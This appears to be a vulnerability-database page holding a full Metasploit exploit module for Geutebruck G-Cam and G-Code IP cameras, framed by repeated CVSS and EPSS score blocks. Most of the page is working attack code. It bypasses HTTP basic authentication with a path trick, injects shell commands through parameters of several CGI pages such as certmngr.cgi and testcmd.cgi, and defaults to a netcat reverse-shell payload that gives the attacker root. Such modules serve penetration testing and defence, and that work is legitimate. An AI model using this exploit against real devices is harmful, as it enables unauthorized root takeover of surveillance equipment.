9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
8 High
AI Score
Confidence
High
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%
This Metasploit module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions 1.12.0.27 and below as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Geutebruck Multiple Remote Command Execution',
'Description' => %q{
This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder
and exploits multiple authenticated arbitrary command execution vulnerabilities within
the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,
EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as
well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in
remote code execution as the root user.
},
'Author' => [
'Titouan Lazard', # Of RandoriSec - Discovery
'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2021-33543'],
['CVE', '2021-33544'],
['CVE', '2021-33548'],
['CVE', '2021-33550'],
['CVE', '2021-33551'],
['CVE', '2021-33552'],
['CVE', '2021-33553'],
['CVE', '2021-33554'],
[ 'URL', 'http://geutebruck.com' ],
[ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
[ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
],
'DisclosureDate' => '2021-07-08',
'Privileged' => true,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD],
'Targets' => [
[
'CVE-2021-33544 - certmngr.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'createselfcert',
'local' => Rex::Text.rand_text_alphanumeric(10..16),
'country' => Rex::Text.rand_text_alphanumeric(2),
'state' => '$(PLACEHOLDER_CMD)',
'organization' => Rex::Text.rand_text_alphanumeric(10..16),
'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
'days' => Rex::Text.rand_text_numeric(2..4),
'type' => Rex::Text.rand_text_numeric(2..4)
},
'uri' => '/../uapi-cgi/certmngr.cgi'
}
],
[
'CVE-2021-33548 - factory.cgi', {
'http_method' => 'GET',
'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/factory.cgi'
}
],
[
'CVE-2021-33550 - language.cgi', {
'http_method' => 'GET',
'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/language.cgi'
}
],
[
'CVE-2021-33551 - oem.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'set',
'enable' => 'yes',
'environment.lang' => '$(PLACEHOLDER_CMD)'
},
'uri' => '/../uapi-cgi/oem.cgi'
}
],
[
'CVE-2021-33552 - simple_reclistjs.cgi', {
'http_method' => 'GET',
'http_vars' => {
'action' => 'get',
'timekey' => Rex::Text.rand_text_numeric(2..4),
'date' => '$(PLACEHOLDER_CMD)'
},
'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
}
],
[
'CVE-2021-33553 - testcmd.cgi', {
'http_method' => 'GET',
'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
'uri' => '/../uapi-cgi/testcmd.cgi'
}
],
[
'CVE-2021-33554 - tmpapp.cgi', {
'http_method' => 'GET',
'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
'uri' => '/../uapi-cgi/tmpapp.cgi'
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
},
'Notes' => {
'Stability' => ['CRASH_SAFE'],
'Reliability' => ['REPEATABLE_SESSION'],
'SideEffects' => ['ARTIFACTS_ON_DISK']
}
)
)
end
def firmware
res = send_request_cgi(
'method' => 'GET',
'uri' => '/brand.xml'
)
unless res
print_error('Connection failed!')
return false
end
unless res&.body && !res.body.empty?
print_error('Empty body in the response!')
return false
end
res_xml = res.get_xml_document
if res_xml.at('//firmware').nil?
print_error('Target did not respond with a XML document containing the "firmware" element!')
return false
end
raw_text = res_xml.at('//firmware').text
if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
else
print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
false
end
end
def check
version = firmware
if version == false
return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!')
end
rex_version = Rex::Version.new(version)
vprint_status("Found Geutebruck version #{rex_version}")
if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
return CheckCode::Appears
end
CheckCode::Safe
end
def exploit
print_status("#{rhost}:#{rport} - Setting up request...")
method = target['http_method']
if method == 'GET'
http_method_vars = 'vars_get'
else
http_method_vars = 'vars_post'
end
http_vars = target['http_vars']
http_vars.each do |(k, v)|
if v.include? 'PLACEHOLDER_CMD'
http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
end
end
print_status("Sending CMD injection request to #{rhost}:#{rport}")
send_request_cgi(
{
'method' => method,
'uri' => target['uri'],
http_method_vars => http_vars
}
)
print_status('Exploit complete, you should get a shell as the root user!')
end
end
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
8 High
AI Score
Confidence
High
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%